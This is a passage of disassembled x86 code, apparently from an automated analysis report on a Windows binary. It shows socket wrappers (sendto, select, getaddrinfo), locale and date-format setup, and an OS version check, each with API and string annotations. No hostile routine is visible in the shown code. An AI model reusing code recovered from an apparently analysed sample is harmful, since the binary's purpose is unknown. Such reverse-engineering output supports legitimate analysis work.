004133DB push dword ptr fs:[eax]
004133DE mov dword ptr fs:[eax], esp
004133E1 cmp dword ptr [0042B3C4h], 00000000h
004133E8 jne 004133FBh
004133EA mov dl, 01h
004133EC mov eax, dword ptr [0040FA48h] 0040FA94
004133F1 call 004036D8h
004133F6 mov dword ptr [0042B3C4h], eax
004133FB mov eax, dword ptr [ebp-04h] xrefs 004133E8
004133FE mov dword ptr [ebp-0Ch], eax
00413401 lea edx, dword ptr [ebp-0Ch]
00413404 mov eax, dword ptr [0042B3C4h] 00000000
00413409 call 00410574h
0041340E call 00412F18h
00413413 cmp word ptr [0042B3BEh], 0000h
0041341B je 0041342Eh
0041341D mov eax, dword ptr [ebp-0Ch]
00413420 mov edx, dword ptr [eax]
00413422 mov eax, dword ptr [0042B3C0h] 00000000
00413428 call dword ptr [0042B3BCh]
0041342E push 0042C860h xrefs 0041341B
00413433 call 0040623Ch
00413438 xor eax, eax
0041343A push ebp
0041343B push 00413469h
00413440 push dword ptr fs:[eax]
00413443 mov dword ptr fs:[eax], esp
00413446 push FFFFFFFFh
00413448 mov eax, dword ptr [ebp-08h]
0041344B push eax
0041344C call 0040629Ch
00413451 xor eax, eax
00413453 pop edx
00413455 pop ecx Count = 2
00413456 mov dword ptr fs:[eax], edx
00413459 push 00413470h
0041345E push 0042C860h xrefs 0041346E
00413463 call 0040611Ch
00413468 ret function end
004134BE pop ebx xrefs 004133A6, 004134B5
004134BF mov esp, ebp
004134C1 pop ebp
004134C2 ret function end
APIs
  • CharNextA.USER32, ref: 00405353
Address Instruction Meta Information
00405350 jmp 00405358h xrefs 00405433, 004053E7, 004053FA
00405352 push eax xrefs 00405361
00405353 call 00401200h CharNextA@USER32.DLL (Import)
00405358 mov dl, byte ptr [eax] xrefs 00405350
0040535A test dl, dl
0040535C je 00405363h
0040535E cmp dl, 0000005Ch
00405361 jne 00405352h
00405363 ret xrefs 0040535C function end
APIs
  • MultiByteToWideChar.KERNEL32, ref: 0040452E
Address Instruction Meta Information
0040451C push ebp xrefs 00404B31, 00404B03
0040451D mov ebp, esp
0040451F push edx
00404520 push eax
00404521 mov eax, dword ptr [ebp+08h]
00404524 push eax
00404525 push ecx
00404526 push 00000000h
00404528 mov eax, dword ptr [0042C5B8h] 00000003
0040452D push eax
0040452E call 004012A0h MultiByteToWideChar@KERNEL32.DLL (Hidden Import)
00404533 pop ebp
00404534 retn 0004h function end
APIs
  • GetLocalTime.KERNEL32, ref: 00408C10
Address Instruction Meta Information
00408C0C add esp, FFFFFFF0h xrefs 00409A80, 00409CAB, 00409C70
00408C0F push esp
00408C10 call 004061B4h GetLocalTime@KERNEL32.DLL (Hidden Import)
00408C15 mov ax, word ptr [esp]
00408C19 add esp, 10h
00408C1C ret function end
APIs
  • sendto.WS2_32, ref: 00413B3A
Address Instruction Meta Information
00413B08 push ebp xrefs 00419CA2
00413B09 mov ebp, esp
00413B0B add esp, FFFFFFE4h
00413B0E push ebx
00413B0F push esi
00413B10 push edi
00413B11 mov esi, dword ptr [ebp+08h]
00413B14 lea edi, dword ptr [ebp-1Ch]
00413B17 push ecx
00413B18 mov ecx, 00000007h
00413B1D rep movsd
00413B1F pop ecx
00413B20 mov edi, ecx
00413B22 mov esi, edx
00413B24 mov ebx, eax
00413B26 lea eax, dword ptr [ebp-1Ch]
00413B29 call 0041399Ch
00413B2E push eax
00413B2F lea eax, dword ptr [ebp-1Ch]
00413B32 push eax
00413B33 mov eax, dword ptr [ebp+0Ch]
00413B36 push eax
00413B37 push edi
00413B38 push esi
00413B39 push ebx
00413B3A call dword ptr [0042B3FCh] sendto@WS2_32.DLL (Hidden Import)
00413B40 pop edi
00413B41 pop esi
00413B42 pop ebx
00413B43 mov esp, ebp
00413B45 pop ebp
00413B46 retn 0008h function end
Strings
  • m/d/yy, va: 0040BAAC
  • mmmm d, yyyy, va: 0040BABC
  • :mm, va: 0040BB24
  • :mm:ss, va: 0040BB30
  • AMPM , va: 0040BB14
  • AMPM, va: 0040BB04
Address Instruction Meta Information
0040B7C0 push ebp xrefs 0040C535
0040B7C1 mov ebp, esp
0040B7C3 mov ecx, 00000008h
0040B7CA push 00000000h Count = 2
0040B7CC dec ecx
0040B7CD jne 0040B7C8h
0040B7CF push ebx
0040B7D0 xor eax, eax
0040B7D2 push ebp
0040B7D3 push 0040BA8Bh
0040B7D8 push dword ptr fs:[eax]
0040B7DB mov dword ptr fs:[eax], esp
0040B7DE call 0040B64Ch
0040B7E3 call 0040A1BCh
0040B7E8 cmp byte ptr [0042C744h], 00000000h
0040B7EF je 0040B7F6h
0040B7F1 call 0040A394h
0040B7F6 call 004061ECh xrefs 0040B7EF
0040B7FB mov ebx, eax
0040B7FD lea eax, dword ptr [ebp-10h]
0040B800 push eax
0040B801 xor ecx, ecx
0040B803 mov edx, 00000014h
0040B808 mov eax, ebx
0040B80A call 0040A10Ch
0040B80F mov edx, dword ptr [ebp-10h]
0040B812 mov eax, 0042C678h
0040B817 call 00404430h
0040B81C lea eax, dword ptr [ebp-14h]
0040B81F push eax
0040B820 mov ecx, 0040BAA0h
0040B825 mov edx, 0000001Bh
0040B82A mov eax, ebx
0040B82C call 0040A10Ch
0040B831 mov eax, dword ptr [ebp-14h]
0040B834 xor edx, edx
0040B836 call 00407608h
0040B83B mov byte ptr [0042C67Ch], al
0040B840 lea eax, dword ptr [ebp-18h]
0040B843 push eax
0040B844 mov ecx, 0040BAA0h
0040B849 mov edx, 0000001Ch
0040B84E mov eax, ebx
0040B850 call 0040A10Ch
0040B855 mov eax, dword ptr [ebp-18h]
0040B858 xor edx, edx
0040B85A call 00407608h
0040B85F mov byte ptr [0042C67Dh], al
0040B864 mov cl, 2Ch
0040B866 mov edx, 0000000Fh
0040B86B mov eax, ebx
0040B86D call 0040A158h
0040B872 mov byte ptr [0042C67Eh], al
0040B877 mov cl, 2Eh
0040B879 mov edx, 0000000Eh
0040B87E mov eax, ebx
0040B880 call 0040A158h
0040B885 mov byte ptr [0042C67Fh], al
0040B88A lea eax, dword ptr [ebp-1Ch]
0040B88D push eax
0040B88E mov ecx, 0040BAA0h
0040B893 mov edx, 00000019h
0040B898 mov eax, ebx
0040B89A call 0040A10Ch
0040B89F mov eax, dword ptr [ebp-1Ch]
0040B8A2 xor edx, edx
0040B8A4 call 00407608h
0040B8A9 mov byte ptr [0042C680h], al
0040B8AE mov cl, 2Fh
0040B8B0 mov edx, 0000001Dh
0040B8B5 mov eax, ebx
0040B8B7 call 0040A158h
0040B8BC mov byte ptr [0042C681h], al
0040B8C1 lea eax, dword ptr [ebp-24h]
0040B8C4 push eax
0040B8C5 mov ecx, 0040BAACh ASCII "m/d/yy"
0040B8CA mov edx, 0000001Fh
0040B8CF mov eax, ebx
0040B8D1 call 0040A10Ch
0040B8D6 mov eax, dword ptr [ebp-24h]
0040B8D9 lea edx, dword ptr [ebp-20h]
0040B8DC call 0040A444h
0040B8E1 mov edx, dword ptr [ebp-20h]
0040B8E4 mov eax, 0042C684h
0040B8E9 call 00404430h
0040B8EE lea eax, dword ptr [ebp-2Ch]
0040B8F1 push eax
0040B8F2 mov ecx, 0040BABCh ASCII "mmmm d, yyyy"
0040B8F7 mov edx, 00000020h
0040B8FC mov eax, ebx
0040B8FE call 0040A10Ch
0040B903 mov eax, dword ptr [ebp-2Ch]
0040B906 lea edx, dword ptr [ebp-28h]
0040B909 call 0040A444h
0040B90E mov edx, dword ptr [ebp-28h]
0040B911 mov eax, 0042C688h
0040B916 call 00404430h
0040B91B mov cl, 3Ah
0040B91D mov edx, 0000001Eh
0040B922 mov eax, ebx
0040B924 call 0040A158h
0040B929 mov byte ptr [0042C68Ch], al
0040B92E lea eax, dword ptr [ebp-30h]
0040B931 push eax
0040B932 mov ecx, 0040BAD4h
0040B937 mov edx, 00000028h
0040B93C mov eax, ebx
0040B93E call 0040A10Ch
0040B943 mov edx, dword ptr [ebp-30h]
0040B946 mov eax, 0042C690h
0040B94B call 00404430h
0040B950 lea eax, dword ptr [ebp-34h]
0040B953 push eax
0040B954 mov ecx, 0040BAE0h
0040B959 mov edx, 00000029h
0040B95E mov eax, ebx
0040B960 call 0040A10Ch
0040B965 mov edx, dword ptr [ebp-34h]
0040B968 mov eax, 0042C694h
0040B96D call 00404430h
0040B972 lea eax, dword ptr [ebp-08h]
0040B975 call 004043DCh
0040B97A lea eax, dword ptr [ebp-0Ch]
0040B97D call 004043DCh
0040B982 lea eax, dword ptr [ebp-38h]
0040B985 push eax
0040B986 mov ecx, 0040BAA0h
0040B98B mov edx, 00000025h
0040B990 mov eax, ebx
0040B992 call 0040A10Ch
0040B997 mov eax, dword ptr [ebp-38h]
0040B99A xor edx, edx
0040B99C call 00407608h
0040B9A1 test eax, eax
0040B9A3 jne 0040B9B4h
0040B9A5 lea eax, dword ptr [ebp-04h]
0040B9A8 mov edx, 0040BAECh
0040B9AD call 00404474h
0040B9B2 jmp 0040B9C1h
0040B9B4 lea eax, dword ptr [ebp-04h] xrefs 0040B9A3
0040B9B7 mov edx, 0040BAF8h
0040B9BC call 00404474h
0040B9C1 lea eax, dword ptr [ebp-3Ch] xrefs 0040B9B2
0040B9C4 push eax
0040B9C5 mov ecx, 0040BAA0h
0040B9CA mov edx, 00000023h
0040B9CF mov eax, ebx
0040B9D1 call 0040A10Ch
0040B9D6 mov eax, dword ptr [ebp-3Ch]
0040B9D9 xor edx, edx
0040B9DB call 00407608h
0040B9E0 test eax, eax
0040B9E2 jne 0040BA23h
0040B9E4 lea eax, dword ptr [ebp-40h]
0040B9E7 push eax
0040B9E8 mov ecx, 0040BAA0h
0040B9ED mov edx, 00001005h
0040B9F2 mov eax, ebx
0040B9F4 call 0040A10Ch
0040B9F9 mov eax, dword ptr [ebp-40h]
0040B9FC xor edx, edx
0040B9FE call 00407608h
0040BA03 test eax, eax
0040BA05 jne 0040BA16h
0040BA07 lea eax, dword ptr [ebp-0Ch]
0040BA0A mov edx, 0040BB04h ASCII " AMPM"
0040BA0F call 00404474h
0040BA14 jmp 0040BA23h
0040BA16 lea eax, dword ptr [ebp-08h] xrefs 0040BA05
0040BA19 mov edx, 0040BB14h ASCII "AMPM "
0040BA1E call 00404474h
0040BA23 push dword ptr [ebp-08h] xrefs 0040B9E2, 0040BA14
0040BA26 push dword ptr [ebp-04h]
0040BA29 push 0040BB24h ASCII ":mm"
0040BA2E push dword ptr [ebp-0Ch]
0040BA31 mov eax, 0042C698h
0040BA36 mov edx, 00000004h
0040BA3B call 00404738h
0040BA40 push dword ptr [ebp-08h]
0040BA43 push dword ptr [ebp-04h]
0040BA46 push 0040BB30h ASCII ":mm:ss"
0040BA4B push dword ptr [ebp-0Ch]
0040BA4E mov eax, 0042C69Ch
0040BA53 mov edx, 00000004h
0040BA58 call 00404738h
0040BA5D mov cl, 2Ch
0040BA5F mov edx, 0000000Ch
0040BA64 mov eax, ebx
0040BA66 call 0040A158h
0040BA6B mov byte ptr [0042C746h], al
0040BA70 xor eax, eax
0040BA72 pop edx
0040BA74 pop ecx Count = 2
0040BA75 mov dword ptr fs:[eax], edx
0040BA78 push 0040BA92h
0040BA7D lea eax, dword ptr [ebp-40h] xrefs 0040BA90
0040BA80 mov edx, 00000010h
0040BA85 call 00404400h
0040BA8A ret function end
APIs
  • CharNextA.USER32, ref: 0040B38D
Address Instruction Meta Information
0040B380 push ebx xrefs 0040B413, 00409056, 0040B3D9
0040B381 mov ebx, eax
0040B383 cmp byte ptr [0042C744h], 00000000h
0040B38A je 0040B396h
0040B38C push ebx
0040B38D call 004062ACh CharNextA@USER32.DLL (Import)
0040B392 sub eax, ebx
0040B394 pop ebx
0040B395 ret function end
0040B396 mov eax, 00000001h xrefs 0040B38A
0040B39B pop ebx
0040B39C ret function end
APIs
  • FreeLibrary.KERNEL32, ref: 00414CF4
Address Instruction Meta Information
00414C90 push ebp xrefs 0041C80A
00414C91 mov ebp, esp
00414C93 mov eax, dword ptr [0042C8A4h] 00960A4C
00414C98 call 00413914h
00414C9D xor eax, eax
00414C9F push ebp
00414CA0 push 00414D18h
00414CA5 push dword ptr fs:[eax]
00414CA8 mov dword ptr fs:[eax], esp
00414CAB dec dword ptr [0042B460h]
00414CB1 cmp dword ptr [0042B460h], 00000000h
00414CB8 jnl 00414CC1h
00414CBA xor eax, eax
00414CBC mov dword ptr [0042B460h], eax
00414CC1 cmp dword ptr [0042B460h], 00000000h xrefs 00414CB8
00414CC8 jne 00414D00h
00414CCA cmp dword ptr [0042B464h], 00000000h
00414CD1 je 00414CE5h
00414CD3 mov eax, dword ptr [0042B464h] 71AB0000
00414CD8 push eax
00414CD9 call 00406154h
00414CDE xor eax, eax
00414CE0 mov dword ptr [0042B464h], eax
00414CE5 cmp dword ptr [0042B468h], 00000000h xrefs 00414CD1
00414CEC je 00414D00h
00414CEE mov eax, dword ptr [0042B468h] 00000000
00414CF3 push eax
00414CF4 call 00406154h FreeLibrary@KERNEL32.DLL (Hidden Import)
00414CF9 xor eax, eax
00414CFB mov dword ptr [0042B468h], eax
00414D00 xor eax, eax xrefs 00414CC8, 00414CEC
00414D02 pop edx
00414D04 pop ecx Count = 2
00414D05 mov dword ptr fs:[eax], edx
00414D08 push 00414D1Fh
00414D0D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414D1D
00414D12 call 0041391Ch
00414D17 ret function end
APIs
  • getsockname.WS2_32, ref: 00413A2D
Address Instruction Meta Information
00413A10 push ebx xrefs 004185C5
00413A11 push esi
00413A12 push ecx
00413A13 mov ebx, edx
00413A15 mov esi, eax
00413A17 mov dword ptr [esp], 0000001Ch
00413A1E mov eax, ebx
00413A20 xor ecx, ecx
00413A22 mov edx, dword ptr [esp]
00413A25 call 00403030h
00413A2A push esp
00413A2B push ebx
00413A2C push esi
00413A2D call dword ptr [0042B42Ch] getsockname@WS2_32.DLL (Hidden Import)
00413A33 pop edx
00413A34 pop esi
00413A35 pop ebx
00413A36 ret function end
APIs
  • LocalAlloc.KERNEL32, ref: 00405F97
Address Instruction Meta Information
00405F94 push eax xrefs 00405FC9
00405F95 push 00000040h
00405F97 call 00405F7Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00405F9C ret function end
Address Instruction Meta Information
00413184 push ebp xrefs 00422535, 004296AD
00413185 mov ebp, esp
00413187 add esp, FFFFFFF0h
0041318A push ebx
0041318B push esi
0041318C xor ebx, ebx
0041318E mov dword ptr [ebp-10h], ebx
00413191 test dl, dl
00413193 je 0041319Dh
00413195 add esp, FFFFFFF0h
00413198 call 00403950h
0041319D mov ebx, ecx xrefs 00413193
0041319F mov byte ptr [ebp-01h], dl
004131A2 mov esi, eax
004131A4 xor eax, eax
004131A6 push ebp
004131A7 push 0041322Eh
004131AC push dword ptr fs:[eax]
004131AF mov dword ptr fs:[eax], esp
004131B2 xor edx, edx
004131B4 mov eax, esi
004131B6 call 004036D8h
004131BB call 00412F24h
004131C0 mov byte ptr [esi+0Eh], bl
004131C3 mov byte ptr [esi+0Ch], bl
004131C6 push esi
004131C7 push 00000004h
004131C9 lea eax, dword ptr [esi+08h]
004131CC push eax
004131CD mov ecx, 004130DCh
004131D2 xor edx, edx
004131D4 xor eax, eax
004131D6 call 00404390h
004131DB mov ebx, eax
004131DD mov dword ptr [esi+04h], ebx
004131E0 test ebx, ebx
004131E2 jne 00413218h
004131E4 call 004061ACh
004131E9 lea edx, dword ptr [ebp-10h]
004131EC call 0040A0C0h
004131F1 mov eax, dword ptr [ebp-10h]
004131F4 mov dword ptr [ebp-0Ch], eax
004131F7 mov byte ptr [ebp-08h], 0000000Bh
004131FB lea eax, dword ptr [ebp-0Ch]
004131FE push eax
004131FF push 00000000h
00413201 mov ecx, dword ptr [0042B93Ch] 0040F614
00413207 mov dl, 01h
00413209 mov eax, dword ptr [004100F0h] 0041013C
0041320E call 0040A9C0h
00413213 call 00403DB8h
00413218 xor eax, eax xrefs 004131E2
0041321A pop edx
0041321C pop ecx Count = 2
0041321D mov dword ptr fs:[eax], edx
00413220 push 00413235h
00413225 lea eax, dword ptr [ebp-10h] xrefs 00413233
00413228 call 004043DCh
0041322D ret function end
APIs
  • select.WS2_32, ref: 00419AC3
Address Instruction Meta Information
00419A64 push ebx
00419A65 push esi
00419A66 push edi
00419A67 add esp, FFFFFEF4h
00419A6D mov ecx, edx
00419A6F mov ebx, eax
00419A71 mov eax, ecx
00419A73 mov esi, 000003E8h
00419A78 cdq
00419A79 idiv esi
00419A7B imul eax, edx, 000003E8h
00419A81 mov dword ptr [esp+04h], eax
00419A85 mov eax, ecx
00419A87 mov esi, 000003E8h
00419A8C cdq
00419A8D idiv esi
00419A8F mov dword ptr [esp], eax
00419A92 mov eax, esp
00419A94 inc ecx
00419A95 jne 00419A99h
00419A97 xor eax, eax
00419A99 lea esi, dword ptr [ebx+00000095h] xrefs 00419A95
00419A9F lea edi, dword ptr [esp+08h]
00419AA3 mov ecx, 00000041h
00419AA8 rep movsd
00419AAA push eax
00419AAD push 00000000h Count = 2
00419AAF lea eax, dword ptr [esp+14h]
00419AB3 push eax
00419AB4 mov eax, dword ptr [ebx+000001B4h]
00419ABA inc eax
00419ABB push eax
00419ABC mov eax, dword ptr [0042B978h] 0042B448
00419AC1 mov eax, dword ptr [eax]
00419AC3 call eax select@WS2_32.DLL (Hidden Import)
00419AC5 mov esi, eax
00419AC7 mov edx, esi
00419AC9 mov eax, ebx
00419ACB mov ecx, dword ptr [eax]
00419ACD call dword ptr [ecx+78h]
00419AD0 cmp dword ptr [ebx+000001B8h], 00000000h
00419AD7 je 00419ADBh
00419AD9 xor esi, esi
00419ADB test esi, esi xrefs 00419AD7
00419ADD setnle al
00419AE0 add esp, 0000010Ch
00419AE6 pop edi
00419AE7 pop esi
00419AE8 pop ebx
00419AE9 ret function end
Address Instruction Meta Information
00404358 push ebp
00404359 mov ebp, esp
0040435B call 0040366Ch
00404360 push ebp
00404361 xor ecx, ecx
00404363 push 00403F1Ch
00404368 mov edx, dword ptr fs:[ecx]
0040436B push edx
0040436C mov dword ptr fs:[ecx], esp
0040436F mov eax, dword ptr [ebp+08h]
00404372 mov ecx, dword ptr [eax+04h]
00404375 mov edx, dword ptr [eax]
00404377 push ecx
00404378 push edx
00404379 call 004026E8h
0040437E pop edx
0040437F pop eax
00404380 call edx
00404382 xor edx, edx
00404384 pop ecx
00404385 mov dword ptr fs:[edx], ecx
00404388 pop ecx
0040438A pop ebp Count = 2
0040438B retn 0004h function end
Address Instruction Meta Information
00402E54 push ebp xrefs 00422232
00402E55 mov ebp, esp
00402E57 push ebx
00402E58 mov ebx, dword ptr [ebp+08h]
00402E5B push ebx
00402E5C push 0000D7B2h
00402E61 push 00402DA0h
00402E66 push 00000065h
00402E68 call 00402DA8h
00402E6D pop ebx
00402E6E pop ebp
00402E6F retn 0004h function end
APIs
  • LocalAlloc.KERNEL32, ref: 00405F97
  • TlsSetValue.KERNEL32, ref: 00405FE5
Address Instruction Meta Information
00405FA8 push ebx xrefs 00406006
00405FA9 call 00405FA0h
00405FAE mov ebx, eax
00405FB0 test ebx, ebx
00405FB2 je 00405FEAh
00405FB4 cmp dword ptr [0042B0C4h], FFFFFFFFh
00405FBB jne 00405FC7h
00405FBD mov eax, 000000E2h
00405FC2 call 0040434Ch
00405FC7 mov eax, ebx xrefs 00405FBB
00405FC9 call 00405F94h
00405FCE test eax, eax
00405FD0 jne 00405FDEh
00405FD2 mov eax, 000000E2h
00405FD7 call 0040434Ch
00405FDC jmp 00405FEAh
00405FDE push eax xrefs 00405FD0
00405FDF mov eax, dword ptr [0042B0C4h] 00000000
00405FE4 push eax
00405FE5 call 00405F8Ch TlsSetValue@KERNEL32.DLL (Hidden Import)
00405FEA pop ebx xrefs 00405FB2, 00405FDC
00405FEB ret function end
APIs
  • GetACP.KERNEL32, ref: 0040B59F
  • GetCPInfo.KERNEL32, ref: 0040B5ED
Address Instruction Meta Information
0040B5D4 push ebp xrefs 0040B791, 0040B6DF
0040B5D5 mov ebp, esp
0040B5D7 push ecx
0040B5D8 push ebx
0040B5D9 push esi
0040B5DA push edi
0040B5DB mov edi, dword ptr [ebp+08h]
0040B5DE add edi, FFFFFFECh
0040B5E1 push edi
0040B5E2 mov eax, dword ptr [0042C738h] 00000409
0040B5E7 call 0040B560h
0040B5EC push eax
0040B5ED call 0040617Ch GetCPInfo@KERNEL32.DLL (Hidden Import)
0040B5F2 xor esi, esi
0040B5F4 jmp 0040B61Fh
0040B5F6 mov al, byte ptr [edi+esi+06h] xrefs 0040B62C
0040B5FA mov bl, byte ptr [edi+esi+07h]
0040B5FE sub bl, al
0040B600 jc 0040B61Ch
0040B602 inc ebx
0040B603 mov byte ptr [ebp-01h], al
0040B606 mov al, byte ptr [ebp-01h] xrefs 0040B61A
0040B609 and eax, 000000FFh
0040B60E bts dword ptr [0042B130h], eax
0040B615 inc byte ptr [ebp-01h]
0040B618 dec bl
0040B61A jne 0040B606h
0040B61C add esi, 02h xrefs 0040B600
0040B61F cmp esi, 0Ch xrefs 0040B5F4
0040B622 jnl 0040B62Eh
0040B624 mov al, byte ptr [edi+esi+06h]
0040B628 or al, byte ptr [edi+esi+07h]
0040B62C jne 0040B5F6h
0040B62E pop edi xrefs 0040B622
0040B62F pop esi
0040B630 pop ebx
0040B631 pop ecx
0040B632 pop ebp
0040B633 ret function end
APIs
  • inet_addr.WS2_32, ref: 004140CB
  • gethostbyname.WS2_32, ref: 004140F1
  • getaddrinfo.WS2_32, ref: 004141D7
  • getnameinfo.WS2_32, ref: 00414245
  • FreeAddrInfoW.WS2_32, ref: 0041428E
Strings
  • 0.0.0.0, va: 0041430C
  • %d.%d.%d.%d, va: 004142F8
Address Instruction Meta Information
00414078 push ebp xrefs 00419808
00414079 mov ebp, esp
0041407B add esp, FFFFFFA4h
0041407E push ebx
0041407F push esi
00414080 push edi
00414081 xor ebx, ebx
00414083 mov dword ptr [ebp-0Ch], ebx
00414086 mov dword ptr [ebp-10h], ebx
00414089 mov dword ptr [ebp-18h], ebx
0041408C mov ebx, ecx
0041408E mov esi, edx
00414090 mov dword ptr [ebp-04h], eax
00414093 mov eax, dword ptr [ebp-04h]
00414096 call 00404868h
0041409B xor eax, eax
0041409D push ebp
0041409E push 004142E0h
004140A3 push dword ptr fs:[eax]
004140A6 mov dword ptr fs:[eax], esp
004140A9 mov eax, dword ptr [ebp+08h]
004140AC mov edx, dword ptr [eax]
004140AE call dword ptr [edx+44h]
004140B1 mov eax, esi
004140B3 call 00413B74h
004140B8 test al, al
004140BA jne 0041418Fh
004140C0 mov eax, dword ptr [ebp-04h]
004140C3 call 00404878h
004140C8 mov ebx, eax
004140CA push ebx
004140CB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
004140D1 inc eax
004140D2 jne 0041417Fh
004140D8 mov eax, dword ptr [0042C8A4h] 00960A4C
004140DD call 00413914h
004140E2 xor edx, edx
004140E4 push ebp
004140E5 push 00414178h
004140EA push dword ptr fs:[edx]
004140ED mov dword ptr fs:[edx], esp
004140F0 push ebx
004140F1 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
004140F7 test eax, eax
004140F9 je 00414160h
004140FB mov esi, dword ptr [eax+0Ch]
004140FE xor ebx, ebx
00414100 jmp 00414159h
00414102 mov eax, dword ptr [eax] xrefs 0041415E
00414104 mov dword ptr [ebp-1Ch], eax
00414107 lea eax, dword ptr [ebp-18h]
0041410A push eax
0041410B xor eax, eax
0041410D mov al, byte ptr [ebp-1Ch]
00414110 mov dword ptr [ebp-5Ch], eax
00414113 mov byte ptr [ebp-58h], 00000000h
00414117 xor eax, eax
00414119 mov al, byte ptr [ebp-1Bh]
0041411C mov dword ptr [ebp-54h], eax
0041411F mov byte ptr [ebp-50h], 00000000h
00414123 xor eax, eax
00414125 mov al, byte ptr [ebp-1Ah]
00414128 mov dword ptr [ebp-4Ch], eax
0041412B mov byte ptr [ebp-48h], 00000000h
0041412F xor eax, eax
00414131 mov al, byte ptr [ebp-19h]
00414134 mov dword ptr [ebp-44h], eax
00414137 mov byte ptr [ebp-40h], 00000000h
0041413B lea edx, dword ptr [ebp-5Ch]
0041413E mov ecx, 00000003h
00414143 mov eax, 004142F8h ASCII "%d.%d.%d.%d"
00414148 call 00408048h
0041414D mov edx, dword ptr [ebp-18h]
00414150 mov eax, dword ptr [ebp+08h]
00414153 mov ecx, dword ptr [eax]
00414155 call dword ptr [ecx+38h]
00414158 inc ebx
00414159 mov eax, dword ptr [esi+ebx*4] xrefs 00414100
0041415C test eax, eax
0041415E jne 00414102h
00414160 xor eax, eax xrefs 004140F9
00414162 pop edx
00414164 pop ecx Count = 2
00414165 mov dword ptr fs:[eax], edx
00414168 push 0041429Ch
0041416D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 0041417D
00414172 call 0041391Ch
00414177 ret function end
0041417F mov edx, dword ptr [ebp-04h] xrefs 004140D2
00414182 mov eax, dword ptr [ebp+08h]
00414185 mov ecx, dword ptr [eax]
00414187 call dword ptr [ecx+38h]
0041418A jmp 0041429Ch
0041418F xor eax, eax xrefs 004140BA
00414191 mov dword ptr [ebp-08h], eax
00414194 xor edx, edx
00414196 push ebp
00414197 push 00414295h
0041419C push dword ptr fs:[edx]
0041419F mov dword ptr fs:[edx], esp
004141A2 lea eax, dword ptr [ebp-3Ch]
004141A5 xor ecx, ecx
004141A7 mov edx, 00000020h
004141AC call 00403030h
004141B1 xor eax, eax
004141B3 mov dword ptr [ebp-38h], eax
004141B6 mov eax, dword ptr [ebp+0Ch]
004141B9 mov dword ptr [ebp-34h], eax
004141BC mov dword ptr [ebp-30h], ebx
004141BF xor eax, eax
004141C1 mov dword ptr [ebp-3Ch], eax
004141C4 lea eax, dword ptr [ebp-08h]
004141C7 push eax
004141C8 lea eax, dword ptr [ebp-3Ch]
004141CB push eax
004141CC push 00000000h
004141CE mov eax, dword ptr [ebp-04h]
004141D1 call 00404878h
004141D6 push eax
004141D7 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004141DD test eax, eax
004141DF jne 00414277h
004141E5 mov ebx, dword ptr [ebp-08h]
004141E8 jmp 0041426Fh
004141ED cmp esi, 17h xrefs 00414271
004141F0 jne 004141F8h
004141F2 cmp dword ptr [ebx+04h], 02h
004141F6 je 0041426Ch
004141F8 cmp esi, 02h xrefs 004141F0
004141FB jne 00414203h
004141FD cmp dword ptr [ebx+04h], 17h
00414201 je 0041426Ch
00414203 mov edi, 00000401h xrefs 004141FB
00414208 mov dword ptr [ebp-14h], 00000020h
0041420F lea eax, dword ptr [ebp-0Ch]
00414212 mov edx, edi
00414214 call 004049A8h
00414219 lea eax, dword ptr [ebp-10h]
0041421C mov edx, dword ptr [ebp-14h]
0041421F call 004049A8h
00414224 push 0000000Ah
00414226 mov eax, dword ptr [ebp-14h]
00414229 push eax
0041422A mov eax, dword ptr [ebp-10h]
0041422D call 00404878h
00414232 push eax
00414233 push edi
00414234 mov eax, dword ptr [ebp-0Ch]
00414237 call 00404878h
0041423C push eax
0041423D mov eax, dword ptr [ebx+10h]
00414240 push eax
00414241 mov eax, dword ptr [ebx+18h]
00414244 push eax
00414245 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
0041424B test eax, eax
0041424D jne 0041426Ch
0041424F mov eax, dword ptr [ebp-0Ch]
00414252 call 00404878h
00414257 mov edx, eax
00414259 lea eax, dword ptr [ebp-0Ch]
0041425C call 004045D4h
00414261 mov edx, dword ptr [ebp-0Ch]
00414264 mov eax, dword ptr [ebp+08h]
00414267 mov ecx, dword ptr [eax]
00414269 call dword ptr [ecx+38h]
0041426C mov ebx, dword ptr [ebx+1Ch] xrefs 0041424D, 00414201, 004141F6
0041426F test ebx, ebx xrefs 004141E8
00414271 jne 004141EDh
00414277 xor eax, eax xrefs 004141DF
00414279 pop edx
0041427B pop ecx Count = 2
0041427C mov dword ptr fs:[eax], edx
0041427F push 0041429Ch
00414284 cmp dword ptr [ebp-08h], 00000000h xrefs 0041429A
00414288 je 00414294h
0041428A mov eax, dword ptr [ebp-08h]
0041428D push eax
0041428E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414294 ret xrefs 00414288 function end
0041429C mov eax, dword ptr [ebp+08h] xrefs 0041418A
0041429F mov edx, dword ptr [eax]
004142A1 call dword ptr [edx+14h]
004142A4 test eax, eax
004142A6 jne 004142B5h
004142A8 mov edx, 0041430Ch ASCII "0.0.0.0"
004142AD mov eax, dword ptr [ebp+08h]
004142B0 mov ecx, dword ptr [eax]
004142B2 call dword ptr [ecx+38h]
004142B5 xor eax, eax xrefs 004142A6
004142B7 pop edx
004142B9 pop ecx Count = 2
004142BA mov dword ptr fs:[eax], edx
004142BD push 004142E7h
004142C2 lea eax, dword ptr [ebp-18h] xrefs 004142E5
004142C5 call 004043DCh
004142CA lea eax, dword ptr [ebp-10h]
004142CD mov edx, 00000002h
004142D2 call 00404400h
004142D7 lea eax, dword ptr [ebp-04h]
004142DA call 004043DCh
004142DF ret function end
APIs
  • GetVersionExA.KERNEL32, ref: 0040B096
Address Instruction Meta Information
0040B088 add esp, FFFFFF6Ch xrefs 0040C52B
0040B08E mov dword ptr [esp], 00000094h
0040B095 push esp
0040B096 call 004061FCh GetVersionExA@KERNEL32.DLL (Hidden Import)
0040B09B test eax, eax
0040B09D je 0040B0EFh
0040B09F mov eax, dword ptr [esp+10h]
0040B0A3 mov dword ptr [0042B0E8h], eax
0040B0A8 mov eax, dword ptr [esp+04h]
0040B0AC mov dword ptr [0042B0ECh], eax
0040B0B1 mov eax, dword ptr [esp+08h]
0040B0B5 mov dword ptr [0042B0F0h], eax
0040B0BA cmp dword ptr [0042B0E8h], 01h
0040B0C1 jne 0040B0D3h
